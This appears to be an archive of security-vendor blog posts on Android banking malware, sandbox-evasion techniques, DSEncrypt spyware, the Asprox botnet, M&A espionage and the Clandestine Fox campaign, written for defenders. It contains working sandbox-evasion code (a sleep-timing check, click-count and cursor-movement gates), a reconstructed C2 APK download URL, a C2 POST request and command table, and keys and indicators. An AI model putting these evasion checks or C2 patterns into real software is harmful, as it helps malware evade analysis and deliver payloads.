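# Later actions (e.g. the fake-app replacement) read the map back out
installed = [row[0] for row in conn.execute("SELECT shortname FROM banklist")]
```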


In this malicious action, the CNC server sends a command to replace the existing bank apps. The eight banking apps require the installation of “com.ahnlab.v3mobileplus,” a popular anti-virus application available on Google Play. In order to evade detection, the malware kills the anti-virus application before manipulating the bank apps. In the code shown below, Conf.LV is the “com.ahnlab.v3mobileplus” process being killed.


Then, the malware app parses the banking apps that the user has installed on the Android device and stores them in the database under /data/data/com.ll/database/simple_pref. The red block below shows the bank list stored in the database:


Once the corresponding command is sent from the RAT, the resolvePopWindow() method will be called and the device will pop a Window with the message: “The new version has been released. Please use after reinstallation.”


The malware will then try to download an app, named after “update” plus the bank’s short name, from the CNC server, while simultaneously uninstalling the real, original bank app.


In the code shown above, “mpath” contains the CNC server IP ( and path (determined by the RAT); “mbkname” is the bank name retrieved from the SQLite database. The fake APK (e.g. "updateBH.apk") is downloaded from the CNC server; however, we don’t know what the fake apps look like because the command for this malicious action was never issued by the RAT during our research. Still, the source of the “update*.apk” is certainly not certified by the banks and might be harmful to the Android user.
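Based on the naming scheme described above, the download URL can be reconstructed roughly as follows. The host and path here are placeholders (198.51.100.1 is a documentation-range IP; the real C2 address and path layout are not reproduced):

```python
def fake_apk_url(c2_ip: str, path: str, bank_shortname: str) -> str:
    """Reconstruct the fake-app download URL: the APK is named "update"
    plus the bank's short name, e.g. updateBH.apk. The URL layout is an
    assumption for illustration."""
    return f"http://{c2_ip}/{path}/update{bank_shortname}.apk"

url = fake_apk_url("198.51.100.1", "files", "BH")
print(url)  # http://198.51.100.1/files/updateBH.apk
```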


When the command to “update” is sent from the RAT, a similar app, “update.apk,” is downloaded from the CNC server and installed on the Android phone:



When the command to upload SMS is received from the RAT, the SMS messages on the Android phone will be uploaded to the CNC server. Each SMS is stored in the database as soon as it is received:



Then the SMS is read from the database and uploaded to the CNC server once the command is received:



Similarly, when the sending SMS command is received, the contact list is sent through SMS.



Interestingly enough, we found a partially finished method called “Bank Hijack.” The code below shows part of how the BankHijack method works. The malware reads the short bank name, e.g. “NH,” and then keeps installing updateNH.apk from the CNC server until it is the newest version.


So far, the part after the installation of the fake app is unfinished. We believe the hacker has temporarily run into problems completing this function.


As shown above, the hacker has designed and prepared for the framework of a more malicious command from the CNC server once the hijack methods are finished. Given the unique nature of how this app works, including its ability to pull down multiple levels of personal information and impersonate banking apps, a more robust mobile banking threat could be on the horizon.








Turing Test in Reverse: New Sandbox-Evasion Techniques Seek Human Interaction

Last year, we published a paper titled “Hot Knives Through Butter: Evading File-Based Sandboxes.” In this paper, we explained many sandbox evasion methods, and today’s blog post adds to our growing catalog.

In the past, for example, we detailed the inner workings of a Trojan we dubbed UpClicker. The malware was notable for a then-novel technique to evade automated dynamic analysis systems (better known as sandboxes). UpClicker activates only when the left mouse button is clicked and released — a sign that it is running on a real, live, human-controlled PC rather than within an automated sandbox.

If the malware determines it is running in a sandbox, it lies dormant so that the sandbox doesn’t observe any suspicious behavior. Once the sandbox incorrectly clears it as a benign file, UpClicker goes on to real computers to do its dirty work.

Last year, our colleague Rong Hwa shared the technical details of another sandbox-detecting Trojan called BaneChant. Like UpClicker, BaneChant uses human interaction to ascertain whether it is running in a virtual-machine environment, activating only after it detects more than three left clicks.

Since then, we’ve seen a spate of new malware that pushes the concept further. The newest sandbox-evading malware counters recent efforts to mimic human behavior in sandbox environments.

This blog post describes three tactics that FireEye has discovered in recent attacks.

Sandbox evasion: a primer

Most sandbox-evasion techniques fall into one of three categories:

Human interaction. This category includes malware that requires certain actions on the user’s part (a sign that the malicious code is running on a real-live PC rather than within an automated sandbox).

Configuration specific. Malware in this category takes advantage of the inherent constraints of file-based sandboxes. For example, knowing that a sandbox can spend, say, five minutes running suspicious code for analysis, malware creators can create code that automatically lies dormant for a longer period. If the code is still running after that, it’s probably not in a sandbox.

Environment specific. In this category, malware checks for telltale signs that its code is running in widely used VM environments. It checks for obscure files unique to VMware, for instance, or VM-specific hardware drivers.
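The “configuration specific” category can be illustrated with a simple stalling check. This is a generic sketch of the technique, not code taken from a specific sample: the program sleeps, then measures how much wall-clock time actually passed, because some sandboxes skip or shorten sleeps to save analysis time:

```python
import time

def sandbox_fast_forwarded(nap_seconds: float = 2.0) -> bool:
    """Generic stalling check (illustrative): sleep, then compare the
    wall-clock time that actually elapsed. A sleep that returns far too
    early suggests the environment is fast-forwarding timers."""
    start = time.monotonic()
    time.sleep(nap_seconds)
    elapsed = time.monotonic() - start
    # Returned in less than half the requested time: likely instrumented
    return elapsed < nap_seconds * 0.5
```

On real hardware the sleep completes in full and the function returns False; an analysis environment that fast-forwards sleeps would trip the check, and the malware would stay dormant.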

The first category of sandbox evasion is one of the trickiest to counter. To fool sandbox-detecting malware, some vendors now simulate mouse movement and clicks in their virtual-machine environments to mimic human activity. But malware authors are upping the ante with even more sophisticated sandbox detection and evasion techniques.

To scroll is human

One malware we discovered lies dormant until the user scrolls to the second page of a Rich Text Format (RTF) document. So simulating human interaction with random or preprogrammed mouse movements isn’t enough to activate its malicious behavior.

Here’s how it works:

RTF documents consist of normal text, control words, and groups. Microsoft’s RTF specification includes a shape-drawing function, which includes a series of properties using the following syntax:

{\sp {\sn propertyName } {\sv propertyValueInformation}}

In this code, \sp is the control word for the drawing property, \sn is the property name, and \sv contains information about the property value. The code snippet in Figure 1 exploits a vulnerability that occurs when using an invalid \sv value for the pFragments shape property.


Figure 1: Code exploiting vulnerability in the RTF pFragments property

A closer look at the exploit code reveals a series of paragraph marks (\par) that appears before the exploit code.


Figure 2: A series of \par (paragraph marks) that appears before the exploit code

The repeated paragraph marks push the exploit code to the second page of the RTF document. So the malicious code does not execute unless the document scrolls down to bring the exploit code up into the active window—more likely a deliberate act by a human user than simulated movement in a virtual machine.
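The padding trick itself is trivial to reproduce in a benign form. The sketch below just builds an RTF body whose repeated \par marks push text onto the second page; the payload string here is harmless filler, not exploit code:

```python
def pad_to_second_page(payload_text: str, par_count: int = 200) -> str:
    """Benign illustration: repeated \\par marks push `payload_text`
    past the first page, so it only scrolls into view (and, in the
    exploit's case, becomes active) through deliberate human action."""
    return "{\\rtf1 " + "\\par " * par_count + payload_text + "}"

doc = pad_to_second_page("second-page content")
```

The exact number of \par marks needed depends on page size; 200 is an arbitrary value for the sketch.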

Only when the RTF document is scrolled down to the second page does the exploit code trigger. As shown in Figure 3, it then calls the URLDownloadToFileA function from the shellcode to download an executable file.


Figure 3: Exploit code

In a typical file-based sandbox, where any mouse activity is random or preprogrammed, the RTF document’s second page will never appear. So the malicious code never executes, and nothing seems amiss in the sandbox analysis.

Two clicks and you’re out

Another sandbox-evading attack we spotted in recent attacks waits for more than two mouse clicks before executing. The two-click condition aims to more accurately determine whether an actual person is operating the targeted machine—most people click mouse buttons many times throughout the day—or a one-time programmed click designed to counter evasion techniques.

Here’s how this technique works:

The malware invokes the function GetAsyncKeyState in a loop. The function checks whether any mouse button has been clicked by querying the virtual-key codes 0x01, 0x02, and 0x04. (The code 0x01 is the virtual-key code for the mouse’s left button, 0x02 is the code for the right button, and 0x04 is the code for the middle button.)

The instruction “xor edi, edi” sets edi to 0. If any of the buttons is pressed, the code invokes the instruction “inc edi,” as shown in Figure 4. After that, the instruction “cmp edi, 2” checks whether the left, right, or middle mouse buttons have been clicked more than two times. If so, the code exits the loop and gets to its real work. Otherwise, it stays under the radar, continuously checking for more mouse clicks.


Figure 4: Assembly code for evasion employing left, middle or right mouse clicks
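The logic of that loop can be modeled in a few lines of Python. This is a model only; the real malware polls the Windows GetAsyncKeyState API from x86 code rather than consuming an event list:

```python
def waits_for_clicks(events, threshold=2):
    """Model of the click-count gate: walk a stream of input events and
    report how many events pass before the number of mouse-button presses
    (virtual-key codes 0x01, 0x02, 0x04) exceeds `threshold`, mirroring
    the "cmp edi, 2" check. Returns None if the gate never opens."""
    clicks = 0
    for consumed, vk in enumerate(events, start=1):
        if vk in (0x01, 0x02, 0x04):
            clicks += 1
        if clicks > threshold:
            return consumed  # gate opens: behave maliciously
    return None  # never activated: consistent with a sandbox's one-shot click
```

A sandbox that simulates a single click never trips the gate, while a human clicking through a normal workday does so almost immediately.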

Slow mouse, fast sandbox

Another recently discovered evasion technique involves checking for suspiciously fast mouse movement. To make sure an actual person is controlling the mouse or trackpad, malware code checks how quickly the cursor is moving. Superhuman speed is a telltale sign that the code is running in a sandbox.

This technique also makes use of the Windows function GetCursorPos, which retrieves the system’s cursor position. In the example malware code shown in Figure 5, GetCursorPos returns 614 for the x-axis value and 185 for the y-axis value.


Figure 5: Malware making first call to API GetCursorPos

A few instructions later, the malicious code again calls GetCursorPos to check whether the cursor position has changed. This time the function returns x = 1019 and y = 259, as shown in Figure 6.


Figure 6: Malware making second call to API GetCursorPos

A few instructions after the second GetCursorPos call, the malware invokes the instruction “SUB EDI, DWORD PTR DS:[410F15]”. As shown in Figure 7, the value in EDI is 0x103 (259 in decimal) and DS:[410F15] = 0xB9 (185 in decimal). The values 259 and 185 are the Y coordinates retrieved from the two GetCursorPos calls. If the difference between the two Y-coordinate measurements is not 0, the malware terminates.


Figure 7:  Subtracting the Y coordinates to detect whether the cursor is moving too quickly to be human-controlled

In other words, if the cursor has moved between the two GetCursorPos calls (which are only a few instructions apart), then the malware concludes that the mouse movement is simulated. That’s too fast to be a real-world mouse or track pad in normal use, so the code must be running in a sandbox.
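The whole check reduces to comparing two Y coordinates. A Python model of the decision (the malware itself does this in a handful of x86 instructions via GetCursorPos):

```python
def cursor_moved_too_fast(sample1, sample2):
    """Model of the two-sample cursor check: the positions are read only a
    few instructions apart, so any Y-coordinate difference implies
    superhuman (i.e., simulated) movement and the malware terminates."""
    (_, y1), (_, y2) = sample1, sample2
    return (y2 - y1) != 0

# The (x, y) values observed in the sample: first (614, 185), then (1019, 259)
assert cursor_moved_too_fast((614, 185), (1019, 259))  # simulated -> exit
```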

A growing challenge

Cybersecurity is a constant arms race. Simulating mouse movement and clicks is not enough to fool the most advanced sandbox-evading malware. Now malware authors are incorporating real-world behaviors into their evasion strategies.

Simulating these behaviors—the way actual people scroll documents, click the mouse button, and move the cursor— is a huge challenge for cybersecurity. Anticipating future evasion techniques might be even tougher. Expect malware authors to employ more novel techniques that look for that human touch.

In the paper “Hot Knives Through Butter: Evading File-Based Sandboxes,” we outlined 15 earlier evasion techniques that advanced malware has used in real attacks to bypass file-based sandboxes. We plan to continue updating this evasion series as we come across new techniques used by the latest threats.

What are you doing? – DSEncrypt Malware

Executive Summary

Have you ever downloaded and installed a large Android application that had very few actual UI elements or little functionality? Recently, FireEye Labs mobile security researchers discovered a new kind of mobile malware that encrypts an embedded Android application inside an attachment in an asset folder, concealing all malicious activities within a seemingly benign application.

The malware app disguises itself as the Google Play store app, placing its similar icon close to the real Google Play store icon on the homescreen. Once installed, the hacker uses a dynamic DNS server with the Gmail SSL protocol to collect text messages, signature certificates and bank passwords from the Android devices.

The relationship between the main application, the attached application and the malicious classes are shown below.

[caption id="attachment_5675" align="alignnone" width="552"]Fig. 1. The relationship of the masked app and the embedded malware.[/caption]

The malware package name is com.sdwiurse and the app title is “google app stoy.” Android users can’t remove the app once the device is infected because the “uninstall” function is disabled and the app continues to run as services in the background. These services can be killed manually, but they restart once the Android phone is rebooted.

Owing to the unique way the malware is packaged, as of June 13, 2014, only 3 of 51 anti-virus vendors on VirusTotal detect this app. Because most vendors rely on signature-based detection, they fail to detect the malicious content concealed within apps that appear to be basic or run-of-the-mill.

[caption id="attachment_5700" align="alignnone" width="533"] Fig. 2. The Virus Total detection out of 51 AV vendors. The score was taken on 06/13/2014.[/caption]

The app we observed contains only 711 lines of code, yet is over 1.7MB in size when downloaded. The single largest file, named “ds,” is embedded in the asset folder and is 597KB. After decryption and decompression, however, the real dex package expands to 2.2MB containing the full malware. The small amount of code in the superficial app is one of the evasion techniques the attackers use to mask the malicious classes that swell the app’s size.

User Experience

After installation, a new “google app stoy” icon appears on the Android homescreen. The icon is the same as the “Google Play” icon to confuse users into clicking it. Once clicked, the app asks for administrator privileges on the device, as shown in Figure 3.

[caption id="attachment_5681" align="alignnone" width="547"]Fig. 3. The newly installed icon on the Android desktop and the activation page.[/caption]

When we observe the app in action, its sole user interface consists of pop-ups saying “Program Error” and “It’s Deleted!” when translated from Korean to English. Next, the app terminates and a notification appears reading “Unfortunately, google app stoy has stopped.” After this, the app icon is removed from the homescreen, tricking the user into thinking it’s gone, as shown in Figure 4.

[caption id="attachment_5683" align="alignnone" width="541"] Fig. 4. The misleading "uninstalling" page and Toast message.[/caption]

However, when opening “Settings->Apps,” we can still find the app in the “Downloaded” and “Running Apps” tabs. Furthermore, in the “Downloaded” tab, the app cannot be stopped or uninstalled:

[caption id="attachment_5684" align="alignnone" width="547"] Fig. 5. The app can't be removed in the "Settings-Downloaded" page.[/caption]

In the “Running Apps” tab, there are five services running that were started by the malicious app:

1. uploadContentService
2. UninstallerService
3. SoftService
4. uploadPhone
5. autoRunService

[caption id="attachment_5685" align="alignnone" width="548"] Fig. 6. The five background services started by the app. You won't discover them unless you dig into the long list in the "Running Apps" tab.[/caption]


The file is encrypted using the javax.crypto package of the Java Cryptography Extension (JCE) framework, as shown below.

[caption id="attachment_5686" align="alignnone" width="422"]Fig. 7. Decipher code.[/caption]

The cryptographic algorithm is based on the Data Encryption Standard (DES). The key string is “gjaoun,” as shown in the code below. After the file is decrypted, it is loaded as a dex class:

[caption id="attachment_5688" align="alignnone" width="488"]Fig. 8. The code of decryption and class loading for the embedded file.[/caption]

All the malicious activities and services happen in the loaded dex file.

Malicious Methods

In the source code of the malicious dex package, “class.dex” is decompressed from the decrypted file “”. Analyzing this code, we found three ways the malware steals private information from the infected Android device. We will first explain how the malware works and then analyze the network traffic as evidence of the malicious behaviors.

1. SMS Message Theft

[caption id="attachment_5689" align="alignnone" width="542"]Fig. 9. The code to steal personal SMS.[/caption]

In the code, ak40.txt is a file in the /storage/sdcard0/temp/ folder containing a flag string. When the content equals “1,” the SMS message is sent to an email address. The email address and password are stored among other files in /storage/sdcard0/temp/. The attacker uses Gmail over SSL to evade the network-traffic signature detection used by most AV vendors.
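The flag-file gate described above can be sketched as follows. This is a re-implementation for illustration, not the decompiled code; only the ak40.txt filename, the temp-folder path, and the “1” flag value come from the analysis.

```python
import os

TEMP_DIR = "/storage/sdcard0/temp"  # staging folder reported in the analysis

def should_forward_sms(flag_path: str) -> bool:
    """Forward an intercepted SMS only when the flag file contains "1"."""
    try:
        with open(flag_path) as f:
            return f.read().strip() == "1"
    except OSError:  # flag file absent: stay dormant
        return False

# When the flag is set, the sample mails the SMS out over Gmail's SSL SMTP
# endpoint (e.g. via smtplib.SMTP_SSL); the network step is omitted here so
# the sketch stays runnable offline.
```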

2. Signature Certificate and Key Theft

[caption id="attachment_5691" align="alignnone" width="546"]Fig. 11. The code to steal signature certificate and keys.[/caption]

The variable v1 is the phone number of the compromised Android phone, while Url.getSDPath() returns the “temp” folder in the mounted storage:

[caption id="attachment_5692" align="alignnone" width="533"]Fig. 12. The location of the temporary folder that the malware app uses to collect signature certificate and keys.[/caption]

The same zip file is named “” when uploaded to a server, and named “{PHONE_NUMBER}” when sent through Gmail as an attachment.

3. Bank Account Password Theft

[caption id="attachment_5693" align="alignnone" width="545"]Fig. 13. The code to steal personal bank account and password.[/caption]

Network Traffic

We have intercepted the network traffic of the malicious app in the FireEye Mobile Threat Prevention (MTP) Platform to verify the malicious activities we found in the code above.

1. SMS Message Transmission

Because the destination, including the email address and the password, is stored in a cached file on the phone, we replaced it with a test email account and redirected a test SMS to the newly created address to simulate the scenario of receiving SMS in the MTP platform. Here is an example of the SMS messages we intercepted from the test email account:

[caption id="attachment_5694" align="alignnone" width="541"]Fig. 14. The testing email and SMS we intercepted in the FireEye MTP platform.[/caption]

The time stamps show that the email account received the content (at 9:39 PM) of the victim’s incoming SMS (sent at 9:38 PM) within one minute.

2. Signature Certificate and Key Transmission

We captured the PCap information in the FireEye MTP platform. The PCap shows that the “” is uploaded to domain “”.

[caption id="attachment_5695" align="alignnone" width="557"]Fig. 15. The PCap of the signature certificate and keys.[/caption]

The same file is renamed to {PHONE_NUMBER} and sent as a Gmail attachment over SSL. The picture below shows the signature certificate file and signature primary key, after unzipping the attachment that the malware app leaks to the SMTP server.

[caption id="attachment_5696" align="alignnone" width="554"]Fig. 16. The content of the signature certificate and keys.[/caption]

3. Bank Account Password Transmission

We found email evidence containing victims’ bank accounts and passwords, and worked with Google’s Gmail team to take down the hacker’s email accounts.

A Not-So Civic Duty: Asprox Botnet Campaign Spreads Court Dates and Malware

Executive Summary

FireEye Labs has been tracking a recent spike in malicious email detections that we attribute to a campaign that began in 2013. While malicious email campaigns are nothing new, this one is significant in that we are observing mass-targeting attackers adopting the malware evasion methods pioneered by the stealthier APT attackers. And this is certainly a high-volume business, with anywhere from a few hundred to ten thousand malicious emails sent daily – usually distributing between 50 and 500,000 emails per outbreak.

Through the FireEye Dynamic Threat Intelligence (DTI) cloud, FireEye Labs discovered that each and every major spike in email blasts brought a change in the attributes of their attack. These changes have made it difficult for anti-virus, IPS, firewalls and file-based sandboxes to keep up with the malware and effectively protect endpoints from infection. Worse, if past is prologue, we can expect other malicious, mass-targeting email operators to adopt this approach to bypass traditional defenses.

This blog will cover the trends of the campaign, as well as provide a short technical analysis of the payload.

Campaign Details


Figure 1: Attack Architecture

The campaign first appeared in late December 2013 and has since recurred in fairly cyclical patterns each month. The threat actors behind this campaign appear to be quite responsive to published blogs and reports on their malware techniques, tweaking their malware accordingly in a continuing – and so far successful – effort to evade detection.

In late 2013, malware labeled as Kuluoz, the specific spam component of the Asprox botnet, was discovered to be the main payload of what would become the first malicious email campaign. Since then, the threat actors have continuously tweaked the malware by changing its hardcoded strings, remote access commands, and encryption keys.

Previously, Asprox malicious email campaigns targeted various industries in multiple countries and included a URL link in the message body. The current version of Asprox instead uses a simple zipped email attachment that contains the malicious payload “exe.” Figure 2 below shows a sample message, while Figure 3 is an example of the various court-related email headers used in the campaign.


Figure 2 Email Sample


Figure 3 Email Headers

Some of the recurring themes Asprox used include airline tickets, postal services and license keys. In recent months, however, the court notice and court request-themed emails appear to be the campaign’s most successful phishing theme.

The following list contains examples of email subject variations, specifically for the court notice theme:

  • Urgent court notice
  • Notice to Appear in Court
  • Notice of appearance in court
  • Warrant to appear
  • Pretrial notice
  • Court hearing notice
  • Hearing of your case
  • Mandatory court appearance

The campaign appeared to increase in volume during the month of May. Figure 4 shows the increase in activity of Asprox compared to other crimewares towards the end of May specifically. Figure 5 highlights the regular monthly pattern of overall malicious emails. In comparison, Figure 6 is a compilation of all the hits from our analytics.


Figure 4 Worldwide Crimeware Activity


Figure 5 Overall Asprox Botnet tracking


Figure 6 Asprox Botnet Activity Unique Samples

These malicious email campaign spikes revealed that FireEye appliances, with the support of the DTI cloud, were able to provide a full picture of the campaign (blue), while only a fraction of the emailed malware samples were detected by various anti-virus vendors (yellow).


Figure 7 FireEye Detection vs. Anti-Virus Detection

By the end of May, we observed a big spike in the number of unique binaries associated with this malicious activity. Compared to previous days, when malware authors used just 10-40 unique MD5s per day, we saw about 6,400 unique MD5s sent out on May 29th – a 16,000% increase over the usual malicious email campaign we’d observed. Compared to other recent email campaigns, Asprox uses a far higher volume of unique samples.


Figure 8 Asprox Campaign Unique Sample Tracking


Figure 9 Geographical Distribution of the Campaign


Figure 10 Distribution of Industries Affected

Brief Technical Analysis


Figure 11 Attack Architecture


The infiltration phase consists of the victim receiving a phishing email with a zipped attachment containing the malware payload disguised as an Office document. Figure 11 is an example of one of the more recent phishing attempts.


Figure 12 Malware Payload Icon


Once the victim executes the malicious payload, it starts an svchost.exe process and injects its code into the newly created process. Once loaded into memory, the injected code is unpacked as a DLL. Note that Asprox uses a hardcoded mutex that can be found in its strings.

  1. Typical mutex generation: "2GVWNQJz1"
  2. Create svchost.exe process
  3. Code injection into svchost.exe
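Because the mutex name is hardcoded, defenders can flag samples with a trivial strings scan. A minimal triage sketch (our own heuristic, not taken from the original post):

```python
ASPROX_MUTEX = b"2GVWNQJz1"  # hardcoded mutex noted above

def contains_asprox_mutex(blob: bytes) -> bool:
    """Return True if the hardcoded mutex string appears anywhere in the
    binary's raw bytes -- a cheap triage signal, not a full detection."""
    return ASPROX_MUTEX in blob
```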


Once the DLL is running in memory, it creates a copy of itself in the following location:


Example filename:


It’s important to note that the process first checks for itself in the startup registry key, so a compromised endpoint will have the following registry value populated with the executable:



The malware uses various encryption techniques to communicate with its command and control (C2) nodes. The communication uses an RSA (i.e. PROV_RSA_FULL) encrypted SSL session via the Microsoft Base Cryptographic Provider, while the payloads themselves are RC4 encrypted. Each sample uses a default hardcoded public key, shown below.
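The payload layer uses RC4, a compact and well-known stream cipher. A textbook Python implementation (ours, not code from the sample) shows how little is needed to decrypt such payloads once the key is recovered; encryption and decryption are the same operation:

```python
def rc4(key: bytes, data: bytes) -> bytes:
    """Textbook RC4: key scheduling (KSA) followed by the keystream
    generator (PRGA) XORed over the data."""
    # KSA: permute the 256-byte state array under the key
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    # PRGA: emit keystream bytes and XOR them with the data
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) % 256])
    return bytes(out)
```

Applying the function twice with the same key round-trips the data, which is why the same routine serves for both directions of C2 traffic.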

Default Public Key






-----END PUBLIC KEY-----

First Communication Packet

Bot ID RC4 Encrypted URL

POST /5DBA62A2529A51B506D197253469FA745E7634B4FC


Accept: */*

Content-Type: application/x-www-form-urlencoded

User-Agent: <host useragent>

Host: <host ip>:443

Content-Length: 319

Cache-Control: no-cache


C2 Commands

In comparison to the campaign at the end of 2013, the current campaign uses one of the newer versions of the Asprox family, in which the threat actors added the command “ear.”

if ( wcsicmp(Str1, L"idl") )


if ( wcsicmp(Str1, L"run") )


if ( wcsicmp(Str1, L"rem") )


if ( wcsicmp(Str1, L"ear") )


if ( wcsicmp(Str1, L"rdl") )


if ( wcsicmp(Str1, L"red") )


if ( !wcsicmp(Str1, L"upd") )

C2 command – Description
idl – Idles the process to wait for commands
run – Downloads from a partner site and executes from a specified path
rem – Removes itself
ear – Downloads another executable and creates an autorun entry
rdl – Downloads, injects into svchost, and runs
upd – Downloads and updates
red – Modifies the registry
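The string comparisons above amount to a command dispatcher. A Python sketch of the same dispatch structure (handler actions reduced to descriptive strings; this is illustrative, not the decompiled logic):

```python
def handle_command(cmd: str) -> str:
    """Map a C2 command to its action, mirroring the wcsicmp chain."""
    handlers = {
        "idl": "idle and wait for commands",
        "run": "download from partner site and execute from specified path",
        "rem": "remove itself",
        "ear": "download another executable and create autorun entry",
        "rdl": "download, inject into svchost, and run",
        "upd": "download and update",
        "red": "modify the registry",
    }
    # wcsicmp is case-insensitive, so normalize before the lookup
    return handlers.get(cmd.lower(), "unknown command")
```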

C2 Campaign Characteristics


For the two major malicious email campaign spikes in April and May of 2014, a separate set of C2 nodes was used for each spike.

April May-June


The data reveals that with each malicious email campaign, the Asprox botnet changes its lure themes, C2 domains, and technical details at roughly monthly intervals. And with each new improvement, it becomes more difficult for traditional security methods to detect certain types of malware.


Nart Villeneuve, Jessa dela Torre, and David Sancho. Asprox Reborn. Trend Micro. 2013.

Mergers and Acquisitions: When Two Companies and APT Groups Come Together

With Apple’s purchase of Beats, Pfizer’s failed bids for AstraZeneca, and financial experts pointing to a rally in the M&A market, the last month was a busy one for mergers and acquisitions. Of course, when we first see headlines of a high profile company’s plans for a merger or acquisition, we rush to think of the strategic and industry implications of such a deal. But underneath the “what ifs” and “visions for the future,” is a darker side of M&A that doesn’t make the headlines: the routineness with which companies are breached and crucial data is stolen when two high-profile organizations look to join together.

Over the last few years, concerns over economic espionage have led to greater scrutiny of mergers and acquisitions involving foreign companies – particularly in industries with sensitive technologies and operations that could pose broader economic and security threats. However, entering into a merger or acquisition with a foreign company is not the only way nation-states conduct economic espionage via cyber means, nor are nation-states the only perpetrators of intellectual property theft.

From our experience responding to these breaches, we’ve seen targeted threat actors actively pursuing companies involved in mergers and acquisitions in two ways:

  • Breaching one of the merging or acquired company’s subsidiaries’ and/or partners’ networks to ultimately gain access to the targeted company’s environment and information
  • Compromising and stealing information from a company involved in business talks with a foreign enterprise in order to provide the other side with an insider advantage in the negotiations

From One Friend to Another: Taking Advantage of Trusted Relationships Between Companies

Some threat groups compromise an organization’s environment and then move laterally over a connected network to a partner or subsidiary, while others rely on social engineering tactics, such as the use of phishing emails that appear to be from employees at the partner company. We have seen China-based threat groups previously compromise targets by taking advantage of trusted relationships and bridged networks between companies. Regardless of their method of entry, these actors are often in search of the same thing: intellectual property and proprietary information that can provide their own constituents with a business advantage, whether through adopting a rival’s technology and products, securing advantageous prices, or any other tactic that could give them a leg up.

We investigated one incident in which two threat groups compromised a company shortly after it acquired a subsidiary. The threat actors used their access to the initial company’s network to move laterally to the subsidiary, which had recently developed a proprietary process for a significant new healthcare product. Once inside the subsidiary’s network, the threat groups stole data that included details on the product’s test results. We believe the threat groups sought to give that data to Chinese state-owned companies in that industry for fast-tracking the development of their own version of the groundbreaking product.

Cheating the System: Insider Advantages in Negotiations

We have also seen threat groups compromising organizations involved in merger or acquisition talks with Chinese entities, likely in an effort to steal data that could give negotiators and decision makers valuable insider information with which to manipulate the outcome of the proposed transaction. Unlike other types of economic espionage operations, the threat groups in this type of scenario are generally not in search of a company’s intellectual property. Instead, these actors look for data such as executive emails, negotiation terms, and business plans and information; all of which could benefit the negotiators by giving them insight into the victim company’s financial situation and negotiation strategy.

During one investigation, we found that a China-based threat group had compromised a company that was in the process of acquiring a Chinese subsidiary – a move that would have significantly increased the victim company’s manufacturing and retail capacity in the Chinese market. The threat actors accessed the email accounts of multiple employees involved in the negotiations in what was likely a search for information pertaining to the proceedings. We believe that the threat group then used the stolen information to inform Chinese decision makers involved in the acquisition process, as the Chinese government terminated the talks shortly after the data theft occurred.

What can we expect?

Companies involved in mergers and acquisitions need to be aware of the risks they face from threat actors intent on conducting economic espionage. Entering into a merger or acquisition with an organization that has unidentified intrusions and unaudited networks places a company at risk of compromise from threat actors who may be waiting to move laterally to the newly integrated target.

Similarly, companies, and the law firms representing them, involved in negotiations with Chinese enterprises face risks from threat groups seeking to provide the Chinese entity with an advantage in negotiations. Compromise and economic espionage can have profound impacts on a company’s finances and reputation at any time, but particularly when they are risking hundreds of millions to billions of dollars on M&A.

In many cases as well, there are broader issues of national security, so it’s imperative that companies seek to recognize and mitigate these risks as part of their M&A processes moving forward. Even governments sometimes attempt to mitigate these risks by conducting national security reviews and occasionally rejecting bids based on their findings.[i] Threat actors from many countries engage in economic espionage, making for a wide and varied threat landscape that cannot be handled by the government alone. For examples of just how diverse and crowded a space the targeted threat landscape is becoming, see our recent blog posts on Molerats, Saffron Rose, and Russia and Ukraine.

[i] “The Committee on Foreign Investment in the United States (CFIUS).” U.S. Department of the Treasury. 20 Dec. 2012. Web. 28 May 2014.

Clandestine Fox, Part Deux

We reported at the end of April and the beginning of May on an APT threat group leveraging a zero-day vulnerability in Internet Explorer via phishing email attacks. While Microsoft quickly released a patch to help close the door on future compromises, we have now observed the threat actors behind “Operation Clandestine Fox” shifting their point of attack and using a new vector to target their victims: social networking.

An employee of a company in the energy sector recently received an email with a RAR archive attachment from a purported job candidate. The attachment, ostensibly containing a resume and a sample software program the applicant had written, was from someone we’ll call “Emily,” who had previously contacted the actual employee via a popular social network.

FireEye acquired a copy of the suspicious email – shown below in Figure 1 – and attachment from the targeted employee and investigated. The targeted employee confirmed that “Emily” had contacted him via the popular social network, and that, after three weeks of back and forth messaging “she” sent her “resume” to his personal email address.  

[caption id="attachment_5658" align="aligncenter" width="441"]Figure 1: Sample email illustrating how “Emily” attacks a victim employee[/caption]

Working our way backwards, we reviewed “Emily’s” social network profile and noticed a few strange aspects that raised some red flags. For example, “her” list of contacts had a number of people from the victim’s same employer, as well as employees from other energy companies; “she” also did not seem to have many other “friends” that fit “her” alleged persona. “Her” education history also contained some fake entries.

Further research and discussions with the targeted company revealed that “Emily,” posing as a prospective employee, had also contacted other personnel at the same company. She had asked a variety of probing questions, including inquiring who the IT Manager was and what versions of software they ran – all information that would be very useful for an attacker looking to craft an attack.

It’s worth emphasizing that in the instances above, the attackers used a combination of direct contact via social networks as well as contact via email, to communicate with their intended targets and send malicious attachments. In addition, in almost all cases, the attackers used the target’s personal email address, rather than his or her work address. This could be by design, with a view toward circumventing the more comprehensive email security technologies that most companies have deployed, or also due to many people having their social network accounts linked to their personal rather than work email addresses.

Details - Email Attachment #1

The resume.rar archive contained three files: a weaponized version of the open-source TTCalc application (a mathematical big number calculator), a benign text copy of the TTCalc readme file, and a benign PDF of Emily’s resume. The resume was a nearly identical copy of a sample resume available elsewhere on the Internet.  The file details are below.

Filename MD5 Hash
resume.rar 8b42a80b2df48245e45f99c1bdc2ce51
readme.txt 8c6dba68a014f5437c36583bbce0b7a4
resume.pdf ee2328b76c54dc356d864c8e9d05c954
ttcalc.exe e6459971f63612c43321ffb4849339a2

Upon execution, ttcalc.exe drops the two files listed below, and also launches a legitimate copy of TTCalc v0.8.6 as a decoy:

%USERPROFILE%/Application Data/mt.dat

%USERPROFILE%/Start Menu/Programs/Startup/vc.bat

The file mt.dat is the actual malware executable, which we detect as Backdoor.APT.CookieCutter. (Variants of this backdoor family are also referred to as “Pirpi” in the security industry.) In this case, the malware was configured to use the following remote servers for command and control:

    • swe[.]karasoyemlak[.]com
    • inform[.]bedircati[.]com (Note: This domain was also used during Operation Clandestine Fox)

Metadata for mt.dat:

Description MD5 Hash
md5 1a4b710621ef2e69b1f7790ae9b7a288
